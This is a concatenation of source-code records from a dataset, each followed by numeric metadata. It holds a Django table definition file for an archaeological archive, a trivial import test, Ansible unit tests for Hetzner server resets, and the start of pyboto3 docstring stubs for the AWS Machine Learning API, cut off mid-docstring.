] | null | null | null | archiv/tables.py | acdh-oeaw/4dpuzzle | 7856bbd82c7dfa8da1d5f1ad40593219a35b3cfe | [
"MIT"
] | 6 | 2020-06-05T18:32:02.000Z | 2022-02-10T07:22:24.000Z | archiv/tables.py | acdh-oeaw/4dpuzzle | 7856bbd82c7dfa8da1d5f1ad40593219a35b3cfe | [
"MIT"
] | 1 | 2020-06-30T13:52:41.000Z | 2020-06-30T13:52:41.000Z | # generated by appcreator
import django_tables2 as tables
from django_tables2.utils import A
from browsing.browsing_utils import MergeColumn
from . models import (
Actor,
ArchaeologicalObject4DPuzzleID,
ArchaeologicalObjectID,
ArchiveINF,
AutoCAD,
Convolutecards,
Datenbase,
Document4DPuzzleID,
DocumentTypes,
ExcavationObjectID,
ExcavationSeasons,
Fielddrawing,
Film,
Finddrawing,
Findsheets,
Fotoborndigital,
Fotosgescannt,
Fundinventar4DPuzzleID,
FundinventarInventarnummern,
FundinventarKonvolutnummern,
FundinventarMaterialproben,
FundinventarSteininventar,
GIS,
Geophysics,
Inventorybooks,
PhasenID,
Protocols,
StratenID,
Tables,
ThreeDimensionalModel,
Videos,
WallpaintingInventory
)
class ActorTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
class Meta:
model = Actor
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class ArchaeologicalObject4DPuzzleIDTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = ArchaeologicalObject4DPuzzleID
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class ArchaeologicalObjectIDTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
corresponding_to_archaeological_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = ArchaeologicalObjectID
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class ArchiveINFTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
class Meta:
model = ArchiveINF
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class AutoCADTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = AutoCAD
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class ConvolutecardsTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_id = tables.columns.ManyToManyColumn()
class Meta:
model = Convolutecards
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class DatenbaseTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = Datenbase
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class Document4DPuzzleIDTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
class Meta:
model = Document4DPuzzleID
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class DocumentTypesTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
class Meta:
model = DocumentTypes
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class ExcavationObjectIDTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_id = tables.columns.ManyToManyColumn()
part_of_excavation_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = ExcavationObjectID
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class ExcavationSeasonsTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
class Meta:
model = ExcavationSeasons
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FielddrawingTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
document_type = tables.columns.ManyToManyColumn()
creator_metadata = tables.columns.ManyToManyColumn()
creator_original = tables.columns.ManyToManyColumn()
original_material = tables.columns.ManyToManyColumn()
amendment_drawn_by = tables.columns.ManyToManyColumn()
drawer_monogram = tables.columns.ManyToManyColumn()
excavation_object_id = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
excavation_id = tables.columns.ManyToManyColumn()
class Meta:
model = Fielddrawing
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FilmTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_id = tables.columns.ManyToManyColumn()
class Meta:
model = Film
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FinddrawingTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
class Meta:
model = Finddrawing
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FindsheetsTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = Findsheets
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FotoborndigitalTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = Fotoborndigital
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FotosgescanntTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_id = tables.columns.ManyToManyColumn()
excavation_object_id = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = Fotosgescannt
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class Fundinventar4DPuzzleIDTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
relatedto = tables.columns.ManyToManyColumn()
class Meta:
model = Fundinventar4DPuzzleID
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FundinventarInventarnummernTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
relatedto = tables.columns.ManyToManyColumn()
class Meta:
model = FundinventarInventarnummern
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FundinventarKonvolutnummernTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
find_material = tables.columns.ManyToManyColumn()
excavation_object_id = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = FundinventarKonvolutnummern
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FundinventarMaterialprobenTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = FundinventarMaterialproben
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FundinventarSteininventarTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
relatedto = tables.columns.ManyToManyColumn()
class Meta:
model = FundinventarSteininventar
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class GISTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
relatedto = tables.columns.ManyToManyColumn()
class Meta:
model = GIS
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class GeophysicsTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = Geophysics
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class InventorybooksTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
find_inventory_number = tables.columns.ManyToManyColumn()
class Meta:
model = Inventorybooks
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class PhasenIDTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
area = tables.columns.ManyToManyColumn()
containing_phase_id = tables.columns.ManyToManyColumn()
class Meta:
model = PhasenID
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class ProtocolsTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
document_type = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = Protocols
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class StratenIDTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
area = tables.columns.ManyToManyColumn()
containing_stratum_id = tables.columns.ManyToManyColumn()
class Meta:
model = StratenID
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class TablesTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
relatedto = tables.columns.ManyToManyColumn()
class Meta:
model = Tables
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class ThreeDimensionalModelTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = ThreeDimensionalModel
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class VideosTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = Videos
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class WallpaintingInventoryTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
class Meta:
model = WallpaintingInventory
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
| 30.326577 | 81 | 0.687783 | 1,337 | 13,465 | 6.815258 | 0.090501 | 0.059701 | 0.165496 | 0.122476 | 0.787752 | 0.787752 | 0.783033 | 0.76745 | 0.761414 | 0.742098 | 0 | 0.001015 | 0.195098 | 13,465 | 443 | 82 | 30.395034 | 0.839731 | 0.001708 | 0 | 0.642173 | 1 | 0 | 0.138095 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.01278 | 0 | 0.587859 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
cc63f54e3207a1bbf4fb63fc52cea799c5044f82 | 45 | py | Python | examples/phobos/tests/test_std_algorithm.py | kinke/autowrap | 2f042df3f292aa39b1da0b9607fbe3424f56ff4a | [
"BSD-3-Clause"
] | 47 | 2019-07-16T10:38:07.000Z | 2022-03-30T16:34:24.000Z | examples/phobos/tests/test_std_algorithm.py | kinke/autowrap | 2f042df3f292aa39b1da0b9607fbe3424f56ff4a | [
"BSD-3-Clause"
] | 199 | 2019-06-17T23:24:40.000Z | 2021-06-16T16:41:36.000Z | examples/phobos/tests/test_std_algorithm.py | kinke/autowrap | 2f042df3f292aa39b1da0b9607fbe3424f56ff4a | [
"BSD-3-Clause"
] | 7 | 2019-09-13T18:03:49.000Z | 2022-01-17T03:53:00.000Z | def test_import():
import std_algorithm
| 11.25 | 24 | 0.733333 | 6 | 45 | 5.166667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 45 | 3 | 25 | 15 | 0.861111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 1 | 0 | 1.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ccc05c99396e47dc54fe422a88db93b73a35faf9 | 8,445 | py | Python | venv/lib/python3.6/site-packages/ansible_collections/community/hrobot/tests/unit/plugins/modules/test_reset.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 1 | 2020-01-22T13:11:23.000Z | 2020-01-22T13:11:23.000Z | venv/lib/python3.6/site-packages/ansible_collections/community/hrobot/tests/unit/plugins/modules/test_reset.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 12 | 2020-02-21T07:24:52.000Z | 2020-04-14T09:54:32.000Z | venv/lib/python3.6/site-packages/ansible_collections/community/hrobot/tests/unit/plugins/modules/test_reset.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | null | null | null | # (c) 2019 Felix Fontein <felix@fontein.de>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.community.internal_test_tools.tests.unit.utils.fetch_url_module_framework import (
FetchUrlCall,
BaseTestModule,
)
from ansible_collections.community.hrobot.plugins.module_utils.robot import BASE_URL
from ansible_collections.community.hrobot.plugins.modules import reset
class TestHetznerReset(BaseTestModule):
MOCK_ANSIBLE_MODULEUTILS_BASIC_ANSIBLEMODULE = 'ansible_collections.community.hrobot.plugins.modules.reset.AnsibleModule'
MOCK_ANSIBLE_MODULEUTILS_URLS_FETCH_URL = 'ansible_collections.community.hrobot.plugins.module_utils.robot.fetch_url'
def test_check_valid(self, mocker):
result = self.run_module_success(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'software',
'_ansible_check_mode': True,
}, [
FetchUrlCall('GET', 200)
.result_json({
'reset': {
'server_ip': '123.123.123.123',
'server_ipv6_net': '2a01:4f8:111:4221::',
'server_number': 23,
'type': [
'sw',
'hw',
'man'
],
'operating_status': 'not supported',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['changed'] is True
def test_valid(self, mocker):
result = self.run_module_success(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'manual',
}, [
FetchUrlCall('POST', 200)
.expect_form_value('type', 'man')
.result_json({
'reset': {
'server_ip': '123.123.123.123',
'server_ipv6_net': '2a01:4f8:111:4221::',
'server_number': 23,
'type': 'man',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['changed'] is True
# Errors
def test_invalid(self, mocker):
result = self.run_module_failed(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'power',
}, [
FetchUrlCall('POST', 400)
.expect_form_value('type', 'power')
.result_json({
'error': {
'status': 400,
'code': 'INVALID_INPUT',
'message': 'Invalid input parameters',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['msg'] == 'The chosen reset method is not supported for this server'
def test_check_invalid(self, mocker):
result = self.run_module_failed(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'power',
'_ansible_check_mode': True,
}, [
FetchUrlCall('GET', 200)
.result_json({
'reset': {
'server_ip': '123.123.123.123',
'server_ipv6_net': '2a01:4f8:111:4221::',
'server_number': 23,
'type': [
'sw',
'hw',
'man'
],
'operating_status': 'not supported',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['msg'] == 'The chosen reset method is not supported for this server'
def test_server_not_found(self, mocker):
result = self.run_module_failed(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'power',
}, [
FetchUrlCall('POST', 404)
.expect_form_value('type', 'power')
.result_json({
'error': {
'status': 404,
'code': 'SERVER_NOT_FOUND',
'message': 'Server not found',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['msg'] == 'This server does not exist, or you do not have access rights for it'
def test_check_server_not_found(self, mocker):
result = self.run_module_failed(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'power',
'_ansible_check_mode': True,
}, [
FetchUrlCall('GET', 404)
.result_json({
'error': {
'status': 404,
'code': 'SERVER_NOT_FOUND',
'message': 'Server not found',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['msg'] == 'This server does not exist, or you do not have access rights for it'
def test_reset_not_available(self, mocker):
result = self.run_module_failed(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'power',
}, [
FetchUrlCall('POST', 404)
.expect_form_value('type', 'power')
.result_json({
'error': {
'status': 404,
'code': 'RESET_NOT_AVAILABLE',
'message': 'The server has no reset option',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['msg'] == 'The server has no reset option available'
def test_check_reset_not_available(self, mocker):
result = self.run_module_failed(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'power',
'_ansible_check_mode': True,
}, [
FetchUrlCall('GET', 404)
.result_json({
'error': {
'status': 404,
'code': 'RESET_NOT_AVAILABLE',
'message': 'The server has no reset option',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['msg'] == 'The server has no reset option available'
def test_reset_manual_active(self, mocker):
result = self.run_module_failed(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'power',
}, [
FetchUrlCall('POST', 409)
.expect_form_value('type', 'power')
.result_json({
'error': {
'status': 409,
'code': 'RESET_MANUAL_ACTIVE',
'message': 'There is already a running manual reset',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['msg'] == 'A manual reset is already running'
def test_reset_failed(self, mocker):
result = self.run_module_failed(mocker, reset, {
'hetzner_user': '',
'hetzner_password': '',
'server_number': 23,
'reset_type': 'power',
}, [
FetchUrlCall('POST', 500)
.expect_form_value('type', 'power')
.result_json({
'error': {
'status': 500,
'code': 'RESET_FAILED',
'message': 'Resetting failed due to an internal error',
},
})
.expect_url('{0}/reset/23'.format(BASE_URL)),
])
assert result['msg'] == 'The reset failed due to an internal error at Hetzner'
| 35.93617 | 125 | 0.486679 | 787 | 8,445 | 4.970775 | 0.182973 | 0.039877 | 0.046524 | 0.051125 | 0.801636 | 0.801636 | 0.76227 | 0.76227 | 0.73364 | 0.699131 | 0 | 0.036496 | 0.383541 | 8,445 | 234 | 126 | 36.089744 | 0.714944 | 0.016459 | 0 | 0.766355 | 0 | 0 | 0.267526 | 0.017466 | 0 | 0 | 0 | 0 | 0.046729 | 1 | 0.046729 | false | 0.046729 | 0.018692 | 0 | 0.079439 | 0.004673 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ccc0aa302cba7bdcd52588946ea116a0ba2c4fdc | 88,216 | py | Python | pyboto3/machinelearning.py | thecraftman/pyboto3 | 653a0db2b00b06708334431da8f169d1f7c7734f | [
"MIT"
] | null | null | null | pyboto3/machinelearning.py | thecraftman/pyboto3 | 653a0db2b00b06708334431da8f169d1f7c7734f | [
"MIT"
] | null | null | null | pyboto3/machinelearning.py | thecraftman/pyboto3 | 653a0db2b00b06708334431da8f169d1f7c7734f | [
"MIT"
] | null | null | null | '''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def add_tags(Tags=None, ResourceId=None, ResourceType=None):
"""
Adds one or more tags to an object, up to a limit of 10. Each tag consists of a key and an optional value. If you add a tag using a key that is already associated with the ML object, AddTags updates the tag's value.
See also: AWS API Documentation
:example: response = client.add_tags(
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
ResourceId='string',
ResourceType='BatchPrediction'|'DataSource'|'Evaluation'|'MLModel'
)
:type Tags: list
:param Tags: [REQUIRED]
The key-value pairs to use to create tags. If you specify a key without specifying a value, Amazon ML creates a tag with the specified key and a value of null.
(dict) --A custom key-value pair associated with an ML object, such as an ML model.
Key (string) --A unique identifier for the tag. Valid characters include Unicode letters, digits, white space, _, ., /, =, +, -, %, and @.
Value (string) --An optional string, typically used to describe or define the tag. Valid characters include Unicode letters, digits, white space, _, ., /, =, +, -, %, and @.
:type ResourceId: string
:param ResourceId: [REQUIRED]
The ID of the ML object to tag. For example, exampleModelId .
:type ResourceType: string
:param ResourceType: [REQUIRED]
The type of the ML object to tag.
:rtype: dict
:return: {
'ResourceId': 'string',
'ResourceType': 'BatchPrediction'|'DataSource'|'Evaluation'|'MLModel'
}
"""
pass
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is create_foo, and you'd normally invoke the
operation as client.create_foo(**kwargs), if the
create_foo operation can be paginated, you can use the
call client.get_paginator('create_foo').
"""
pass
def create_batch_prediction(BatchPredictionId=None, BatchPredictionName=None, MLModelId=None, BatchPredictionDataSourceId=None, OutputUri=None):
"""
Generates predictions for a group of observations. The observations to process exist in one or more data files referenced by a DataSource . This operation creates a new BatchPrediction , and uses an MLModel and the data files referenced by the DataSource as information sources.
CreateBatchPrediction is an asynchronous operation. In response to CreateBatchPrediction , Amazon Machine Learning (Amazon ML) immediately returns and sets the BatchPrediction status to PENDING . After the BatchPrediction completes, Amazon ML sets the status to COMPLETED .
You can poll for status updates by using the GetBatchPrediction operation and checking the Status parameter of the result. After the COMPLETED status appears, the results are available in the location specified by the OutputUri parameter.
See also: AWS API Documentation
:example: response = client.create_batch_prediction(
BatchPredictionId='string',
BatchPredictionName='string',
MLModelId='string',
BatchPredictionDataSourceId='string',
OutputUri='string'
)
:type BatchPredictionId: string
:param BatchPredictionId: [REQUIRED]
A user-supplied ID that uniquely identifies the BatchPrediction .
:type BatchPredictionName: string
:param BatchPredictionName: A user-supplied name or description of the BatchPrediction . BatchPredictionName can only use the UTF-8 character set.
:type MLModelId: string
:param MLModelId: [REQUIRED]
The ID of the MLModel that will generate predictions for the group of observations.
:type BatchPredictionDataSourceId: string
:param BatchPredictionDataSourceId: [REQUIRED]
The ID of the DataSource that points to the group of observations to predict.
:type OutputUri: string
:param OutputUri: [REQUIRED]
The location of an Amazon Simple Storage Service (Amazon S3) bucket or directory to store the batch prediction results. The following substrings are not allowed in the s3 key portion of the outputURI field: ':', '//', '/./', '/../'.
Amazon ML needs permissions to store and retrieve the logs on your behalf. For information about how to set permissions, see the Amazon Machine Learning Developer Guide .
:rtype: dict
:return: {
'BatchPredictionId': 'string'
}
"""
pass
def create_data_source_from_rds(DataSourceId=None, DataSourceName=None, RDSData=None, RoleARN=None, ComputeStatistics=None):
"""
Creates a DataSource object from an Amazon Relational Database Service (Amazon RDS). A DataSource references data that can be used to perform CreateMLModel , CreateEvaluation , or CreateBatchPrediction operations.
CreateDataSourceFromRDS is an asynchronous operation. In response to CreateDataSourceFromRDS , Amazon Machine Learning (Amazon ML) immediately returns and sets the DataSource status to PENDING . After the DataSource is created and ready for use, Amazon ML sets the Status parameter to COMPLETED . DataSource in the COMPLETED or PENDING state can be used only to perform CreateMLModel , CreateEvaluation , or CreateBatchPrediction operations.
If Amazon ML cannot accept the input source, it sets the Status parameter to FAILED and includes an error message in the Message attribute of the GetDataSource operation response.
See also: AWS API Documentation
:example: response = client.create_data_source_from_rds(
DataSourceId='string',
DataSourceName='string',
RDSData={
'DatabaseInformation': {
'InstanceIdentifier': 'string',
'DatabaseName': 'string'
},
'SelectSqlQuery': 'string',
'DatabaseCredentials': {
'Username': 'string',
'Password': 'string'
},
'S3StagingLocation': 'string',
'DataRearrangement': 'string',
'DataSchema': 'string',
'DataSchemaUri': 'string',
'ResourceRole': 'string',
'ServiceRole': 'string',
'SubnetId': 'string',
'SecurityGroupIds': [
'string',
]
},
RoleARN='string',
ComputeStatistics=True|False
)
:type DataSourceId: string
:param DataSourceId: [REQUIRED]
A user-supplied ID that uniquely identifies the DataSource . Typically, an Amazon Resource Number (ARN) becomes the ID for a DataSource .
:type DataSourceName: string
:param DataSourceName: A user-supplied name or description of the DataSource .
:type RDSData: dict
:param RDSData: [REQUIRED]
The data specification of an Amazon RDS DataSource :
DatabaseInformation -
DatabaseName - The name of the Amazon RDS database.
InstanceIdentifier - A unique identifier for the Amazon RDS database instance.
DatabaseCredentials - AWS Identity and Access Management (IAM) credentials that are used to connect to the Amazon RDS database.
ResourceRole - A role (DataPipelineDefaultResourceRole) assumed by an EC2 instance to carry out the copy task from Amazon RDS to Amazon Simple Storage Service (Amazon S3). For more information, see Role templates for data pipelines.
ServiceRole - A role (DataPipelineDefaultRole) assumed by the AWS Data Pipeline service to monitor the progress of the copy task from Amazon RDS to Amazon S3. For more information, see Role templates for data pipelines.
SecurityInfo - The security information to use to access an RDS DB instance. You need to set up appropriate ingress rules for the security entity IDs provided to allow access to the Amazon RDS instance. Specify a [SubnetId , SecurityGroupIds ] pair for a VPC-based RDS DB instance.
SelectSqlQuery - A query that is used to retrieve the observation data for the Datasource .
S3StagingLocation - The Amazon S3 location for staging Amazon RDS data. The data retrieved from Amazon RDS using SelectSqlQuery is stored in this location.
DataSchemaUri - The Amazon S3 location of the DataSchema .
DataSchema - A JSON string representing the schema. This is not required if DataSchemaUri is specified.
DataRearrangement - A JSON string that represents the splitting and rearrangement requirements for the Datasource . Sample - '{\'splitting\':{\'percentBegin\':10,\'percentEnd\':60}}'
DatabaseInformation (dict) -- [REQUIRED]Describes the DatabaseName and InstanceIdentifier of an Amazon RDS database.
InstanceIdentifier (string) -- [REQUIRED]The ID of an RDS DB instance.
DatabaseName (string) -- [REQUIRED]The name of a database hosted on an RDS DB instance.
SelectSqlQuery (string) -- [REQUIRED]The query that is used to retrieve the observation data for the DataSource .
DatabaseCredentials (dict) -- [REQUIRED]The AWS Identity and Access Management (IAM) credentials that are used connect to the Amazon RDS database.
Username (string) -- [REQUIRED]The username to be used by Amazon ML to connect to database on an Amazon RDS instance. The username should have sufficient permissions to execute an RDSSelectSqlQuery query.
Password (string) -- [REQUIRED]The password to be used by Amazon ML to connect to a database on an RDS DB instance. The password should have sufficient permissions to execute the RDSSelectQuery query.
S3StagingLocation (string) -- [REQUIRED]The Amazon S3 location for staging Amazon RDS data. The data retrieved from Amazon RDS using SelectSqlQuery is stored in this location.
DataRearrangement (string) --A JSON string that represents the splitting and rearrangement processing to be applied to a DataSource . If the DataRearrangement parameter is not provided, all of the input data is used to create the Datasource .
There are multiple parameters that control what data is used to create a datasource:
``percentBegin`` Use percentBegin to indicate the beginning of the range of the data used to create the Datasource. If you do not include percentBegin and percentEnd , Amazon ML includes all of the data when creating the datasource.
``percentEnd`` Use percentEnd to indicate the end of the range of the data used to create the Datasource. If you do not include percentBegin and percentEnd , Amazon ML includes all of the data when creating the datasource.
